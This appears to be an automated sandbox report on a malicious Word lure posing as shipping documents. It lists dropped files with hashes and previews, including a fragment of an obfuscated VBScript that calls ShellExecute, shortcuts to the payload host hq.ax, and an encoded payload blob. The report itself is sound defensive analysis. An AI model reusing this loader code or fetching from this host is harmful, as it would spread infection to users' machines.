Category:	dropped
Size (bytes):	12800
Entropy (8bit):	3.5716960152208816
Encrypted:	false
SSDEEP:	384:E5/Hbu3TOQ0MmzvCQywE1LTaW8aZK9eKP:Ex7uKQ0Nz5TEx0beKP
MD5:	94202A093FE08E97FA7E9306FECA8FBD
SHA1:	BC631EDED4A71430FF11DA107FE4B20D5B3177A8
SHA-256:	46FB985F19463A89521390A57A035FA2883C0DB3974B2123581B66ADBA193CA6
SHA-512:	D3BD3ADA5AEB5FEF382C5D574A8F1D753F9B33E441D2225858C190B467DE73BFA8FEAEB6A3F3C60C3AAE2B81EF7A650EA82B2FED677E0ABAB77A6BE90157476D
Malicious:	false
Preview:	....................8.0.0.6.6.9.5.0.`.-.@.!._...).;.^._.?.5.`.%.[.?.~.-.<.3.&.5.,.7.^.,.>...[.#.:.%.0.;.(.^.`...[.6.[.9.#.^.0.<.?.\|.].].[.$.~.&.3.:.+..4.2.4.`.?..2.3.$.0.?.?.&..:.$./.,.<.^.9.?...].?.<.\|._.=.3...8.8._.?.:.?.%.&.0...2.:./.!.(..~.:.<.<...>...9.-.~.%.....(.?.&.9.5.?.-.;.%.-.2.^.?.).?./.=.8.[.]..(...:.~.=.+.?.$.?.5.+.?.<.\|.).].?.$.4.'.^._.@.3..._.6.;.[.&.+.^.2._.7.(.=.4.#.'.'...?.=...[./.?.[...!.5.'...@.].?..,.).-.6.^.-.8.+./.;.=.>.]..7.?.^.#.4...?...:.$.#.&.7./.\|.].+.^.?.%./.?.?.^...7.$.4.:./.1.%.:..2.8.,.[.:.%...(.7...-.%.-.^.4.).3.5.?.=...-.4.1.!...!.\|.^.1.^.!.-.#.).@...).~.$.).\|.7.=.'.2.3.2.-.3.).8.6.&.#.5.:.~.`.-..0./.@..,.?.\|.).^.5.9._.-.6.2._.2._.5.$.5.!.(.6.].`.'.9.].?.`.3...9.2.5.$.2.?.$.#.,.3.9.?.6.?...!.%.2.$..^.^.~.?.7.?.;.&.+.+.+.5.'.%.;.$.)..?.<.=.?.%...>.!.....5.2.^.>.?.:.%.>.8.+...?...0._.?.8.3.%.!.+.[.8.?.2.].8.(.#.=.?.?.%.0.(../.3.,.[.>.>.\|.?...].?.(.?.`...,.].!.:.5...3.?._.9.?.).+.5.&.=.^.2.....2......?.0...:.?.5.8.3.!.....?.:.#.+.!.).8.%.\|.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3E3F9CD7-D30B-4D91-9082-56066407C687}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4ddbr1wd.iop.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\4indxxoe.jdf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\5umiqvdy.drc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\Cab425E.tmp

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (2168), with CRLF line terminators
Category:	dropped
Size (bytes):	26892
Entropy (8bit):	5.629815532396056
Encrypted:	false
SSDEEP:	768:HzSR022X/523S0e8xPPmp2TkLqur5pjMpc4i:TSuce8xPP2qur5+bi
MD5:	7A6E4C385A470B962384797F26BC0B8A
SHA1:	5D4EEEEF8961F0CA7A83B5BAEB36BB6715D61A11
SHA-256:	B13926E222564A63A3308DE6CB116C226E93CD1E9D1B5F2FCAC2DE6D80E70206
SHA-512:	BA326CBBA71BBFD6054A1F3564FCF4C085ADD37C186170E039E9CF469CDD16B0FD394F028D4D09EA45FAADEEA4CF5F4EDB64F8C5DB58EB67ED93987740D8E453
Malicious:	true
Preview:	Function Hazardless....Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221)....End Function ....Spetrevlemundstetiser = String(236,"M") ....Rvertogterne = 61512..Supranaturalistic = &H617B..decreers = -54055..dermophobe = "Arkadens wienervalsenes smirkier fitzwater!"..Milieuvrns = &HFFFFB202..Fribilletternes = &HA946..Misrepresentation = 37891..Centralasiens = 4497..Unhasped = &HF896..Dommerstanden = "Trbeskyttelsen udgangene0, gtevir, afvbnede"..Hastemde = 34426..Fuppen = "Ters247 catholical152? turbomotorerne"..Actiniomorpha = "Kontrabogen netvrksadressernes; topvinklen215 stetikkers"..Slumstormer = &HFFFF6B6A..Solennitetssalen150 = 17979..Torskelevers = &H615D..Topstillingen = "Firspring tabulerer"..redigere = "Undiscerningness sprezzatura overdesirous strikkepindes"..Besttes = &H79DF..macroscopical = &H4D24..Hjlpetekstens = &H7376..Controversialism = "Sambars capitulum unfallen gnomists"..Humbug = 19967..Mongrels = -48175..unhelped = "Fortjningen widdies

C:\Users\user\AppData\Local\Temp\Tar425F.tmp

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	data
Category:	modified
Size (bytes):	186277
Entropy (8bit):	6.35155733287026
Encrypted:	false
SSDEEP:	1536:aAZw/J+lCUsTRvsqgCyqWlUDNWdm1wpSru2A0XwjY/z02DTr3rmt6mZ:as2J+qTR0XCy/dmASru2AijbdG
MD5:	4EA6026CF93EC6338144661BF1202CD1
SHA1:	A1DEC9044F750AD887935A01430BF49322FBDCB7
SHA-256:	8EFBC21559EF8B1BCF526800D8070BAAD42474CE7198E26FA771DBB41A76B1D8
SHA-512:	6C7E0980E39AACF4C3689802353F464A08CD17753BD210EE997E5F2A455DEB4F287A9EF74D84579DBDE49BC96213CD2B8B247723919C412EA980AA6E6BFE218B
Malicious:	false
Preview:	0......H..........0......1.0...`.H.e......0......+.....7.......0....0...+.....7...............240514162318Z0...+......0...20..D.....`...@.,..0..0.r1..0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

C:\Users\user\AppData\Local\Temp\bhv4625.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x29890519, page size 32768, DirtyShutdown, Windows version 6.1
Category:	dropped
Size (bytes):	21037056
Entropy (8bit):	1.1390578103820752
Encrypted:	false
SSDEEP:	24576:vO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:vOEXs1LuHqqEXwPW+RHA6m1fN
MD5:	0229B3E0831B83E73D08CD3DA0BCC82C
SHA1:	D71DD4D6300E055B0A9FAF82654EA6FFB47239D6
SHA-256:	8E82EF72F594CE71C20E67D258C76A14BAF787417A3E87D55C7B13FD0D25E8DF
SHA-512:	E10D6E2FE0EB187D4AE772E4F0C20EDFC301F3FF98EE1B3A9ACD6AE23B6C60A7206148A9ED9D9ED9150B8B1A5B089EA4C37AF5224C953D41F2674F633E4124BB
Malicious:	false
Preview:	)...... ........................u..............................;:...{.......\|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lyur

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\mub5rqwr.bt1.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\nosgifui.kdz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tvuakwq2.jyj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\{B2098566-2CFC-4B9E-BC7A-B1A0E86366CD}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025713566417307078
Encrypted:	false
SSDEEP:	6:I3DPcBgOsCVvxggLRawUzld8qDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPgLscXq1vYg3J/
MD5:	EDB3AE9B510FB6CE9285B11B3E4D8B15
SHA1:	6AE44EA35594688A9AA9BB983EE8DE57EED8D02D
SHA-256:	318F1DA0DA86CACEB1E3152CF75602CCFCB748DA921A9D4F603E4A42FAD93E7B
SHA-512:	F522D0AD4E5FB429AA3E70C8EF749BF53F83970FC1E6F250F41C0AA43AF92E27DD7CBF7C5A7022C5AA7FAE81C11005EDA457AF0B00C66814D751196F06DF5949
Malicious:	false
Preview:	......M.eFy...zel.YT..N......:'S,...X.F...Fa.q..............................U....D.@....L...........G.bD.....O.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{D830338D-7FB4-42F3-A4F3-B63821D53AF4}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02553703341530137
Encrypted:	false
SSDEEP:	6:I3DPcD0bvxggLRw0uRXv//4tfnRujlw//+GtluJ/eRuj:I3DP+0bGvYg3J/
MD5:	9C505F289DDE04EB6CF25C84D4C5F083
SHA1:	7699DA2D07D34922B7B2032D3C099ED70DE90A3D
SHA-256:	68EC01CD642E4BE737149ABE85A9AFC6C633CB7D06B6E2C1C086BFDA17BB9722
SHA-512:	2EDB65FB36DB5BB908EAA73077444ED042F91C49A6D2EC39AF682AABAD17CA1A22186C1683433AD0F120805113122E7D35E2AC74D92DFCB5920A8BA220898750
Malicious:	false
Preview:	......M.eFy...ze..83..D...b....S,...X.F...Fa.q.............................nT..~z@................M..B.yH.../r.:$.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF67F6440102D4275A.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF68D693F9F252CFD4.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBD4D1EC3A255F639.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	598016
Entropy (8bit):	7.814257389962844
Encrypted:	false
SSDEEP:	12288:lLwwwwwwwwwwwww5yLjuG7JkqSqFOn3TDNTqha8pNflRUPxEhhx+MxiVo:lLwwwwwwwwwwwwwyAqShn3TDcha8Xflh
MD5:	2909C75A0F7091A1EC0D43AE2C410E28
SHA1:	EEA10701184A511DF1E216CD998BB48DBC70AF59
SHA-256:	E549BCD941FE15D67CCCD842BFBD7866A0D7DED9A950F4E7803E0232266B374E
SHA-512:	83C42B5EB8F9CEA7B2C3682C33E981BAC8FBAC0A7F4B3A78A703773A0B3EC148E9A8B95245ADCCA991820FE7BDCE5E3785389E1BE3188A847E9F84CDF7EAE315
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Oi8.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://hq.ax/Oi8>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.558518613048907
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/rUwIkn:HRYFVm/r4kn
MD5:	1B4BC9797B83C70A631F3E17C47F423A
SHA1:	A9017FE962FA16771924CC3EADA333DD90EF2331
SHA-256:	ECD359F24499D9A6AA1B35698D93AEB9A98B641FB536B66B284FE1C517DBC5F3
SHA-512:	012302B87E1732943772614C87378FFC3C083AB61DFB00A00ED6A617D5A2FD2CE735F6B82B1F733DB905BBE5750F378CA911D12F483F8DC9CDBCE247C0CC6760
Malicious:	true
Preview:	[InternetShortcut]..URL=http://hq.ax/Oi8..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\hq.ax.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://hq.ax/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	39
Entropy (8bit):	4.387465039153174
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/rUwIovn:HRYFVm/r4yn
MD5:	A98C016578664BCFE9980DB27BEA53BC
SHA1:	264F88775FF6B6BCEC03521B9B327779BED33C40
SHA-256:	C7340A75E5EBB4E458802B833CF060B55E3C2AF54A7087E2EEAD60AA273D9118
SHA-512:	870F6DD82ADF77F3D6D7596E8E7BE16C6D062FF0F6EE48B1F675A46CBDA9164C5FA9167BEEFF9E3CF4D7ED81A160FB02EBD75CD7DEAA704856A10282663DEC1C
Malicious:	true
Preview:	[InternetShortcut]..URL=http://hq.ax/..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [xls]
Category:	modified
Size (bytes):	194
Entropy (8bit):	4.958628501716109
Encrypted:	false
SSDEEP:	6:bfLHJLfKGIP1vU1BZSXLGXU9fKGIP1vU1BZSXLGXs:bfliGK1mBZSyE9iGK1mBZSyc
MD5:	A410A51EFC586B9F8C60CEEE07E89F1B
SHA1:	8628BCEF70D1CEDAAFAE1B99ACCDAF33EA3CDFE7
SHA-256:	CFB4759886B85CCAA3780CEC1E575818A7D31BD6BD359093049DF4F6B530B07D
SHA-512:	BA778A60229719911BA9CCB7E9A2CF7D35758D22F2D31FBFC948D273C5E993DB3511D657E4E5B5B88AC97FB72D52D4D8A4564C85794612057A9AF0E7ED90D2BF
Malicious:	false
Preview:	[folders]..Oi8.url=0..hq.ax.url=0..waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.LNK=0..[xls]..waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
MD5:	CB3D0F9D3F7204AF5670A294AB575B37
SHA1:	5E792DFBAD5EDA9305FCF8F671F385130BB967D8
SHA-256:	45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
SHA-512:	BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Snigmyrdede.Sko

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	519984
Entropy (8bit):	5.97310447226679
Encrypted:	false
SSDEEP:	6144:ZhZQKJ7e1+X814RJz1/sEa4Gv9hbtE9XcA4009r0KOD7hXDd+NayYrpqy2RtCPKZ:ZhJecX3jh/PGvrsXcAm0PdDdrEPR1Z
MD5:	047E0275BDD0927F6EFEF87097F21863
SHA1:	4299854E50DA9BF541FA2860DD03B635D7DFBA47
SHA-256:	E0E516EA98D02BC1529767D9C3524B6EC48342AF2C5A704CE976D5F2430DF1C2
SHA-512:	B094D60E78B9FD9C230BF53774BA3853321A37BE02174844B7B6B39B977641438310A14267A26977F4C88DB45E52AE5E6F0F98EBB74D8466E960FD1B958574E3
Malicious:	false
Preview:	2cnYwutE+YdSYLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTprwAAANn/h8nrXvqjJk21tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbUfJd7km9vi60InK4Vpzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs4PZebdwetQhimmGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoPgaMAAAAPcvIpD2Tu60wy73FW9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX1mw9uwWYP/vDrRP8bZXdHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dH3eHZ4etYLaRSf25ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubtn0D/7v600+Ib8dCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCrvYWg8A2f/Z/utL832YKDc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3

C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	415824
Entropy (8bit):	3.5864483548852926
Encrypted:	false
SSDEEP:	3072:bHGMwf1YFjhNe4VTdRnTT8w4TW72qjnEgFypBzxjJS7GzYhOJ8XuBYO0zCV2:Xwf1YFB2qjt
MD5:	4D03B030F4DB434DA80E0EC3FA7E4398
SHA1:	0B4EED00595BE5235F5A51CEBEDA6FA31402B94B
SHA-256:	90AFE2E4506B34BD63E597279707D13C6D8512FD52E0B670C9E45890211C76B6
SHA-512:	7EC4DF4E21931E9091E77D9A23C7D81DE11B89C3D0968CD6E8ABA8F425CDA85B357E4410B3A5A0BB28E80C2AD4999D8C3CC1FBA06A2346720F3ABAD435CE9EBB
Malicious:	true
